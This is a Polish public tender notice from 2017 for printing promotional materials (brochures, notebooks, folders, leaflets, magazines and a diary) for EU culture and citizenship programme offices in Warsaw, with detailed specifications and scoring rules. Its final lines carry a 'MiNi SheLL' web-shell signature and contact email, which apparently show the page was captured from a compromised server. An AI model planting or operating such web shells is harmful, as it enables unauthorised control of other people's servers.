5.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia Jedynie złożenie oryginału dokumentu zawierającego podpis upoważnionej osoby pod treścią oświadczenia, spełnia wymóg formy pisemnej zobowiązania, określonej w art. 26 ust. 2b ustawy Pzp. Podmiot, który zobowiązał się 
do udostępnienia swoich zasobów odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba, że za nieudostępnienie zasobów nie ponosi winy. Dokument, z którego będzie wynikać zobowiązanie podmiotu trzeciego powinien wyrażać w sposób wyraźny i jednoznaczny wolę udzielenie wykonawcy, ubiegającemu się o zamówienia odpowiedniego zasobu oraz wskazywać:
a)	jaki jest zakres dostępnych wykonawcy zasobów,
b)	w jaki sposób zostaną wykorzystane zasoby innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia,
c)	jakiego charakteru stosunki będą łączyły wykonawcę z innym podmiotem,
d)	jaki jest zakres i w jakim okresie inny podmiot będzie brał udział przy wykonywaniu zamówienia.
6. Jeżeli zostanie wybrana oferta Wykonawców ubiegających się wspólnie o udzielenie zamówienia, Wykonawcy zobowiązani są dostarczyć Zamawiającemu w terminie przez niego wyznaczonym umowę regulującą ich współpracę. Umowa regulująca współpracę Wykonawców składających wspólnie ofertę powinna określać m.in.:
1)	podmioty składające ofertę;
2)	cel gospodarczy, dla którego została zawarta umowa;
3)	zasady reprezentacji i prowadzenia spraw;
4)	oznaczenie czasu trwania umowy (wymaga się, aby czas trwania umowy był nie krótszy niż okres realizacji zamówienia oraz okres gwarancji i/lub rękojmi.
7. Brak przedstawienia dokumentu, o którym mowa w ust. 4  Zamawiający potraktuje jako uchylenie się od podpisania umowy, w takim przypadku Zamawiający wybierze ofertę najkorzystniejszą spośród pozostałych ofert.
8.W przypadku, gdy Wykonawca, którego oferta została wybrana jako najkorzystniejsza, uchyla się od zawarcia umowy, Zamawiający będzie mógł wybrać ofertę najkorzystniejszą spośród pozostałych ofert, bez przeprowadzenia ich ponownego badania i oceny chyba, że zachodzą przesłanki, o których mowa w art. 93 ust. 1 ustawy PZP.


</div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Projekty dla programu Kreatywna Europa  komponent Kultura<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Broszura Tłumaczenia Literackie
	Format: A5
	Rodzaj papieru: okładka - kreda 300g, środek - satyna 120g
	Uszlachetnienie okładki: folia mat 1+1, lakier wybiórczy 1+0
	Druk offsetowy
	Zadruk: okładka 4+4, środek 4+4
	Szycie: zeszytowe po długim boku
	Ilość stron: 4+4
	Pakowane po: 25 szt.
	Nakład: 200 szt.
	Wydruk całości nakładu po akceptacji dostarczonego przez drukarnię proofa cyfrowego certyfikowanego (cromalin) wybranej przez Zamawiającego części (okładka + środek)
	Ostateczny termin realizacji: do 21 kwietnia 2017 r.

2.	Broszura Kultura
	Format: A5
	Rodzaj papieru: okładka - kreda 300g, środek - satyna 120g
	Uszlachetnienie okładki: folia mat 1+1, lakier wybiórczy 1+0
	Druk offsetowy
	Zadruk: okładka 4+4, środek 4+4
	Szycie: zeszytowe po długim boku
	Ilość stron: 16+4
	Pakowane po: 25 szt.
	Nakład: 600 szt.
	Wydruk całości nakładu po akceptacji dostarczonego przez drukarnię proofa cyfrowego certyfikowanego (cromalin) wybranej przez Zamawiającego części (okładka + środek)
	Ostateczny termin realizacji: do 24 kwietnia 2017 r.

3.	Broszura Nagrody UE
	Format: A5
	Rodzaj papieru: okładka - kreda 300g, środek - satyna 120g
	Uszlachetnienie okładki: folia mat 1+1, lakier wybiórczy 1+0
	Druk offsetowy
	Zadruk: okładka 4+4, środek 4+4
	Szycie: zeszytowe po długim boku
	Ilość stron: 4+4
	Pakowane po: 25 szt.
	Nakład: 300 szt.
	Wydruk całości nakładu po akceptacji dostarczonego przez drukarnię proofa cyfrowego certyfikowanego (cromalin) wybranej przez Zamawiającego części (okładka + środek)
	Ostateczny termin realizacji: do 17 lipca 2017 r.

4.	Notes KULTURA
	Format: A5
	Rodzaj: szyty klejony po dłuższym boku, z bigowaną okładką (ze skrzydełkiem) 
z tłoczeniem wypukłym i z brzegiem kartek barwionym na wybrany kolor
z gumką do zamykania (przykład mocowania gumki na złączonym zdjęciu)
z tasiemką do zaznaczania stron
	Ilość kartek: 80 
	Druk offsetowy
	Okładka: karton dwustronnie powlekany 350 g/m2
	Okładka bigowana (przykład na załączonych zdjęciach, okładka wg specyfikacji)
	Okładka zadruk: 4+4
	Uszlachetnienie okładki: soft touch 1+0, lakier wybiórczy 1+0, tłoczenie wypukłe
	Środek: papier 100g, z własnym zadrukiem 1+1
	Pakowane po: 25 szt.
	Nakład: 500 szt.
	Wydruk całości nakładu po akceptacji dostarczonego przez drukarnię proofa cyfrowego certyfikowanego (cromalin) wybranej przez Zamawiającego części (okładka + środek)
	Ostateczny termin realizacji: do 7 czerwca 2017 r.
5.	Notes (ADP)
	Format: A5
	Rodzaj: oprawa zeszytowa tj: spięty na dwie metalowe zszywki, po długim boku, 
z gumką do zamykania (mocowanie gumki jak na załączonym zdjęciu)
	Ilość kartek: 60 
	Druk offsetowy
	Okładka: karton dwustronnie powlekany 350 g/m2
	Okładka zadruk 4+4
	Uszlachetnienie okładki: soft touch 1+0, hotstamping folią 1+0
	Środek: papier 80g, z własnym zadrukiem 1+1
	Pakowane po: 25 szt.
	Nakład: 300 szt.
	Wydruk całości nakładu po akceptacji dostarczonego przez drukarnię proofa cyfrowego certyfikowanego (cromalin) wybranej przez Zamawiającego części (okładka + środek)
	Ostateczny termin realizacji: do 18 kwietnia 2017 r.

6.	Teczka na dokumenty A4 (ADP)
	Wykrojnik wg własnego projektu 
przygotowanie wykrojnika po stronie drukarni
	Rodzaj: dwubigowa teczka z kieszenią klejoną po jednym boku i miejscem na wizytówki
	Grzbiet 5mm 
	Papier: karton 300 g dwustronnie powlekany
	Druk offsetowy 
	Zadruk 4+4 
	Uszlachetnienie: soft touch 1+0, hotstamping folią 1+0
	Nakład: 300 szt.
	Wydruk całości nakładu po akceptacji dostarczonego przez drukarnię proofa/prototypu
	Ostateczny termin realizacji: do 18 kwietnia 2017 r.

7.	Publikacja (ADP)
	Format: 210x210 mm
	Rodzaj papieru: karton dwustronnie powlekany 250 g/m2, środek: kreda mat 170 g/m2
	Uszlachetnienie okładki: soft touch 1+0, hotstamping folią 1+0
	Druk offsetowy
	Zadruk: okładka 4+4, środek 4+4
	Szycie: zeszytowe po długim boku
	Ilość stron: 12+4
	Pakowane po: 25 szt.
	Nakład: 300 szt.
	Wydruk całości nakładu po akceptacji dostarczonego przez drukarnię proofa cyfrowego certyfikowanego (cromalin) wybranej przez Zamawiającego części (okładka + środek)
	Ostateczny termin realizacji: do 11 sierpnia 2017 r.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>79823000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b><br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Łączna cena ofertowa brutto</td><td>50</td></tr><tr><td>Jakość</td><td>50</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Ocena punktowa w kryterium jakość dokonana zostanie na podstawie projektów referencyjnych:
- projekt referencyjny zawierający zbliżone wymagania określone w specyfikacji technicznej broszur -  poz. 1,2,3
- projekt referencyjny zawierający zbliżone wymagania określone w specyfikacji technicznej notesu -poz. 4 
- projekt referencyjny zawierający zbliżone wymagania określone w specyfikacji technicznej teczki - poz.6
Ocenie podlegać będzie:
- jakość druku projektów referencyjnych na podstawie palety barwnej  max. 10 pkt. 
- jakość opraw (klejenie, szycie, mocowanie gumki, jakość tasiemki, okładka - dokładność nałożenia lakieru wybiórczego, bigowanie, tłoczenie,  hostamping)  max. 20 pkt. 
- precyzja i estetyka wykonania  max. 20 pkt.

W przypadku, gdy Wykonawca nie załączy projektu referencyjnego otrzyma 0 pkt w kryterium jakość, co jednak nie uniemożliwia mu wzięcia udziału w postępowaniu i złożeniu oferty.
Realizacja oznacza wykonanie i dostarczenie nakładu (wraz z wniesieniem) bezpośrednio do siedziby Wydziału Programów Europejskich IAM: Punktu Kontaktowego Europa dla obywateli oraz programu Kreatywna Europa, Al. Ujazdowskie 41 (III p.  możliwość skorzystania z windy), Warszawa
Zamawiający zastrzega sobie możliwość zmniejszenia liczby nakładu będących przedmiotem zamówienia. W takim przypadku wynagrodzenie wykonawcy będzie stanowić iloczyn ceny jednostkowej oraz ilości sztuk przedmiotu zamówienia. Zmniejszenie zamówienia nie może być większe niż 20% przedmiotu zamówienia w odniesieniu do przedmiotu zamówienia.
<br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Projekty dla programu Kreatywna Europa  komponent MEDIA<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Notes MEDIA
	format: A5
	rodzaj: szyty i klejony po dłuższym boku, w oprawie miękkiej z tłoczeniem wypukłym
	z gumką do zamykania w poziomie, z tasiemką do zaznaczania stron i z brzegiem kartek barwionym na wybrany kolor
	ilość kartek: 80
	druk offsetowy
	Okładka: karton dwustronnie powlekany 350 g/m2
	Okładka zadruk: 4+4
	Uszlachetnienie okładki: soft touch 1+0, lakier wybiórczy 1+0, tłoczenie wypukłe,
	Środek: papier 100g, z własnym zadrukiem 1+1
	Wydruk całości nakładu po akceptacji dostarczonego przez drukarnię proofa cyfrowego certyfikowanego (cromalin)
	Nakład: 700sztuk
	Ostateczny termin realizacji: do 15 czerwca 2017r.

2.	Ulotki - pocztówki
	format: 170x120mm
	papier: biały karton 350g
	druk offsetowy
	zadruk 4+4
	14 różnych wersji grafiki
	uszlachetnienie: folia mat 1+1, lakier wybiórczy 1+0
	nakład: 2 100szt. (14 różnych pocztówek po 150 sztuk)
	Proof kolorów
	Ostateczny termin realizacji: do 28 kwietnia 2017r.

3.	Magazyn CED 2/2017
	Format A4, druk dwustronny kolorowy  (4+4)
	Ilość stron 24 str plus 4 str okładka
	Papier: środki: kreda mat 170 g/m2, okładka: kreda mat 250 g/m2, wykończenie: folia matowa 1+1
	Oprawa zeszytowa
	Nakład: 800 egz.
	Pakowanie: po 50 szt.
	Ostateczny termin realizacji: do 16 czerwca 2017r.

4.	Magazyn CED 3/2017
	Format A4, druk dwustronny kolorowy  (4+4)
	Ilość stron 24 str plus 4 str okładka
	Papier: środki: kreda mat 170 g/m2, okładka: kreda mat 250 g/m2, wykończenie: folia matowa 1+1
	Oprawa zeszytowa
	Nakład: 800 egz.
	Pakowanie: po 50 szt.
	Ostateczny termin realizacji: do 30 sierpnia 2017r.


5.	Przewodnik dla producentów (po angielsku)
	Format A5, 
	4 strony (bigowane po dłuższym boku)
	Papier: kreda mat. 250 g/m2	
	Druk: 4+4	
	Wykończenie: folia matowa 1+1; lakier UV wybiórczy 1+0
	Nakład: 600 szt. (pakowane po 50 szt.)
	Ostateczny termin realizacji:: do 30 maja 2017r.

6.	Broszura dla dystrybutorów
	Format A5,
	4 strony (bigowane po dłuższym boku)	
	Papier: kreda mat. 250 g/m2	
	Druk: 4+4	
	Wykończenie: folia matowa 1+1; lakier UV wybiórczy 1+0	
	Nakład: 800 szt. (pakowane po 50 szt.)	
	Ostateczny termin realizacji: do 15 czerwca 2017r.

7.	Przewodnik po schematach dofinansowania MEDIA
	wymiar: 16,5 x 24 cm (w pionie)
	rodzaj papieru: okładka  kreda mat 300g/m2; środek  offset 100 g/m2
	uszlachetnianie okładki: folia mat. 1:1, lakier UV wybiórczo 1+0
	wykończenie folia mat. 1+1  dotyczy wszystkich stron
	druk offsetowy 4+4
	szycie zeszytowe po długim boku
	maksymalna liczba stron: 36 str. (w tym 4 str. okładki)
	nakład: 1000 szt.
	Ostateczny termin realizacji: do 30 sierpnia 2017 r.

8.	Ulotka (harmonijka) nt. rodzajów działań wspieranych przez komponent MEDIA
	wymiary: DL - 10,5 x 21 cm (w pionie)
	rodzaj papieru: kreda mat 170g/m2
	uszlachetnianie: folia mat 1+1
	druk offsetowy 4+4
	3 bigowania po długim boku
	maksymalna liczba stron: 8 str.
	nakład: 1 000 szt.
	Ostateczny termin realizacji:  do 30 sierpnia 2017r.

9.	Ulotka (harmonijka) nt. rodzajów działań wspieranych przez komponent MEDIA po angielsku
	wymiary: DL - 10,5 x 21 cm (w pionie)
	rodzaj papieru: kreda mat 170g/m2
	uszlachetnianie: folia mat 1+1
	druk offsetowy 4+4
	3 bigowania po długim boku
	maksymalna liczba stron: 8 str.
	nakład: 1000 szt.
	Ostateczny termin realizacji: do 30 czerwca 2017r.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>79823000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b><br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Łączna cena ofertowa brutto</td><td>50</td></tr><tr><td>Jakość</td><td>50</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Ocena punktowa w kryterium jakość dokonana zostanie na podstawie projektów referencyjnych:
- projekt referencyjny zawierający zbliżone wymagania określone w specyfikacji technicznej broszury/ magazynu - poz. 3
- projekt referencyjny zawierający zbliżone wymagania określone w specyfikacji technicznej notesu - poz. 1
Ocenie podlegać będzie:
- jakość druku projektów referencyjnych na podstawie palety barwnej  max. 10 pkt. 
- jakość opraw (klejenie, szycie, mocowanie gumki, jakość tasiemki, okładka - dokładność nałożenia lakieru wybiórczego, tłoczenie, barwienie brzegu kartek, oprawa zeszytowa)  max. 20 pkt. 
- precyzja i estetyka wykonania  max. 20 pkt.


W przypadku, gdy Wykonawca nie załączy projektów referencyjnych otrzyma 0 pkt w kryterium jakość, co jednak nie uniemożliwia mu wzięcia udziału w postępowaniu i złożeniu oferty.
Realizacja oznacza wykonanie i dostarczenie nakładu (wraz z wniesieniem) bezpośrednio do siedziby Wydziału Programów Europejskich IAM: Punktu Kontaktowego Europa dla obywateli oraz programu Kreatywna Europa, Al. Ujazdowskie 41 (III p.  możliwość skorzystania z windy), Warszawa.
Zamawiający zastrzega sobie możliwość zmniejszenia liczby nakładu będących przedmiotem zamówienia. W takim przypadku wynagrodzenie wykonawcy będzie stanowić iloczyn ceny jednostkowej oraz ilości sztuk przedmiotu zamówienia. Zmniejszenie zamówienia nie może być większe niż 20% przedmiotu zamówienia w odniesieniu do przedmiotu zamówienia.
<br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Projekty dla programu Europa dla obywateli<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Kartka okolicznościowa
	Format: A5 składane do A6, bigowane po długim boku 
	Papier: Kreda mat 300g/m2
	Uszlachetnienie: folia mat 1+1, lakier UV wybiórczy 1+0
	Druk offsetowy, zadruk : 4+4
	Nakład: 200 sztuk
	Wydruk całości nakładu po akceptacji dostarczonego przez drukarnię proofa cyfrowego certyfikowanego (cromalin)
	Ostateczny termin realizacji do 31 października 2017r.

2. Ulotka o programie
	format: A5
	A4 składane do A5, bigowanie po długim boku
	ilość stron: 4
	papier: kreda mat 280g
	druk offsetowy
	zadruk 4+4
	uszlachetnienie: folia mat 1+1, 
	Nakład: 500 sztuk
	Wydruk całości nakładu po akceptacji dostarczonego przez drukarnię proofa cyfrowego certyfikowanego (cromalin)
	Ostateczny termin realizacji do 31 lipca 2017r.

3.Ulotka o priorytetach
	format: A4 składane do DL
	papier: kreda mat 280g
	druk offsetowy
	zadruk 4+4
	uszlachetnienie: folia mat 1+1, 
	nakład: 500 sztuk
	Wydruk całości nakładu po akceptacji dostarczonego przez drukarnię proofa cyfrowego certyfikowanego (cromalin)
	Ostateczny termin realizacji do 31 lipca 2017 r.

4.Notes EDO
	format: A5
	rodzaj: szyty klejony po dłuższym boku
z materiałową taśmą grzbietową przyklejoną po długim boku
z gumką (mocowanie gumki jak na zdjęciu)
z tasiemką do zaznaczania stron
	kolor taśmy grzbietowej: granatowy
	kolor gumki i tasiemki do zaznaczania stron: granatowy 
	Kolor granatowy:Pantone Reflex blue C CMYK  100 80 0 0
	ilość kartek: 80 
	druk offsetowy
	Okładka: karton dwustronnie powlekany 350 g/m2
	Kolor żółty:Pantone 130 C CMYK 0 30 100 0
	Okładka zadruk: 4+4
	Uszlachetnienie okładki: soft touch 1+0, lakier wybiórczy 1+0
	Środek: papier 100g, z własnym zadrukiem 1+1
	nakład: 500 sztuk
	Wydruk całości nakładu po akceptacji dostarczonego przez drukarnię proofa cyfrowego certyfikowanego (cromalin)
	Ostateczny termin realizacji do 31 maja 2017 r.
5.Pocztówki o działaniach
	format: 170x120mm 
	papier: biały karton 350g
	druk offsetowy
	zadruk 4+4
	8 różnych wersji grafiki
	uszlachetnienie: soft touch 1+0, lakier UV wybiórczy 1+0 
	nakład: 200 sztuk
	Pakowanie: 8 pocztówek (po 1 każdego rodzaju) do mini teczki, po 25 kompletów w folię
	Wydruk całości nakładu po akceptacji dostarczonego przez drukarnię proofa cyfrowego certyfikowanego (cromalin)
	Ostateczny termin realizacji do 31 lipca 2017 r.

6.Miniteczka dla pocztówek o działaniach
	wzór wykrojnika według dostarczonego projektu, wykonanie wykrojnika po stronie drukarni
	rodzaj: dwubigowa miniteczka formatu 125x175mm z 2 kieszonkami klejonymi po jednym boku
	grzbiet 5 mm 
	papier: biały karton 350g dwustronnie powlekany
	druk offsetowy
	zadruk 4+4
	uszlachetnienie: soft touch 1+0, lakier UV wybiórczy 1+0 
	nakład: 200 sztuk
	Pakowanie: w każdej miniteczce będzie znajdowało się po 8 pocztówek każdego rodzaju z poz.nr 23; po 25 kompletów (8 pocztówek zapakowanych w miniteczkę) w folię
	Wydruk całości nakładu po akceptacji dostarczonego przez drukarnię proofa cyfrowego certyfikowanego (cromalin)
	Ostateczny termin realizacji do 31 lipca 2017 r.

7.Teczka A4 na dokumenty
	wzór wykrojnika według dostarczonego projektu, wykonanie wykrojnika po stronie drukarni
	rodzaj: dwubigowa teczka z kieszenią klejoną po jednym boku i miejscem na wizytówki
	grzbiet 5mm 
	papier: karton 350 g dwustronnie powlekany
	druk offsetowy 
	zadruk 4+4 
	uszlachetnienie: soft touch 1+0, lakier UV wybiórczy 1+0 
	nakład: 500 sztuk
	Wydruk całości nakładu po akceptacji dostarczonego przez drukarnię proofa cyfrowego certyfikowanego (cromalin)
	Ostateczny termin realizacji do 31 maja 2017 r.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>79823000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b><br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Łączna cena ofertowa brutto</td><td>50</td></tr><tr><td>Jakość</td><td>50</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Ocena punktowa w kryterium jakość dokonana zostanie na podstawie projektów referencyjnych:
- projekt referencyjny zawierający zbliżone wymagania określone w specyfikacji technicznej notesu - poz. 4, 
- projekt referencyjny zawierający zbliżone wymagania określone w specyfikacji technicznej teczka -poz. 7,
Ocenie podlegać będzie:
- jakość druku projektów referencyjnych na podstawie palety barwnej  max. 10 pkt. 
- jakość opraw (klejenie, szycie, oprawa grzbietowa - taśma, mocowanie gumki, jakość tasiemki, okładka - dokładność nałożenia lakieru wybiórczego, bigowanie)  max. 20 pkt. 
- precyzja i estetyka wykonania przedstawionych projektów referencyjnych  max. 20 pkt.

W przypadku, gdy Wykonawca nie załączy projektu referencyjnego otrzyma 0 pkt w kryterium jakość, co jednak nie uniemożliwia mu wzięcia udziału w postępowaniu i złożeniu oferty.
Realizacja oznacza wykonanie i dostarczenie nakładu (wraz z wniesieniem) bezpośrednio do siedziby Wydziału Programów Europejskich IAM: Punktu Kontaktowego Europa dla obywateli oraz programu Kreatywna Europa, Al. Ujazdowskie 41 (III p.  możliwość skorzystania z windy), Warszawa
Zamawiający zastrzega sobie możliwość zmniejszenia liczby nakładu będących przedmiotem zamówienia. W takim przypadku wynagrodzenie wykonawcy będzie stanowić iloczyn ceny jednostkowej oraz ilości sztuk przedmiotu zamówienia. Zmniejszenie zamówienia nie może być większe niż 20% przedmiotu zamówienia w odniesieniu do przedmiotu zamówienia.
<br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Kalendarz książkowy  EDO 2018<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>	format: A5
	rodzaj: szyty i klejony, z materiałową taśmą grzbietową przyklejoną po długim boku i tasiemką do zaznaczania stron
	kolor taśmy grzbietowej: granatowy
	kolor tasiemki: żółty 
	Kolor granatowy: Pantone Reflex blue C CMYK  100 80 0 0
	Kolor żółty: CMYK 0 30 100 0 (Odcień może być zbliżony do podanych.)
	ilość stron: 165
	druk offsetowy
	Okładka: 1075 g (1,75 mm)
	Oklejka: kreda matowa 150 g
	Wyklejka: zadruk 4+0, papier offset 150g
	Oklejka zadruk: 4+0
	Uszlachetnienie okładki: folia mat 1+0, lakier UV wybiórczy 1+0
	Środek: papier niepowlekany 150g, z własnym zadrukiem 4+4
	nakład: 300 sztuk
	Wydruk całości nakładu po akceptacji dostarczonego przez drukarnię proofa cyfrowego certyfikowanego (cromalin)
	Ostateczny termin realizacji do 31 października 2017 r.

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>79823000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b><br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Łączna cena ofertowa brutto</td><td>50</td></tr><tr><td>Jakość</td><td>50</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Ocena punktowa w kryterium jakość dokonana zostanie na podstawie załączonego projektu referencyjnego.
Ocenie podlegać będzie:
- jakość druku projektu referencyjnego na podstawie palety barwnej  max. 10 pkt. 
- jakość opraw (klejenie, szycie, oprawa grzbietowa - taśma, jakość tasiemki, okładka - dokładność nałożenia lakieru wybiórczego)  max. 20 pkt. 
- precyzja i estetyka wykonania projektu referencyjnego  max. 20 pkt.

W przypadku, gdy Wykonawca nie załączy projektu referencyjnego otrzyma 0 pkt w kryterium jakość, co jednak nie uniemożliwia mu wzięcia udziału w postępowaniu i złożeniu oferty.
Realizacja oznacza wykonanie i dostarczenie nakładu (wraz z wniesieniem) bezpośrednio do siedziby Wydziału Programów Europejskich IAM: Punktu Kontaktowego Europa dla obywateli oraz programu Kreatywna Europa, Al. Ujazdowskie 41 (III p.  możliwość skorzystania z windy), Warszawa.
Zamawiający zastrzega sobie możliwość zmniejszenia liczby nakładu będących przedmiotem zamówienia. W takim przypadku wynagrodzenie wykonawcy będzie stanowić iloczyn ceny jednostkowej oraz ilości sztuk przedmiotu zamówienia. Zmniejszenie zamówienia nie może być większe niż 20% przedmiotu zamówienia w odniesieniu do przedmiotu zamówienia
<br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com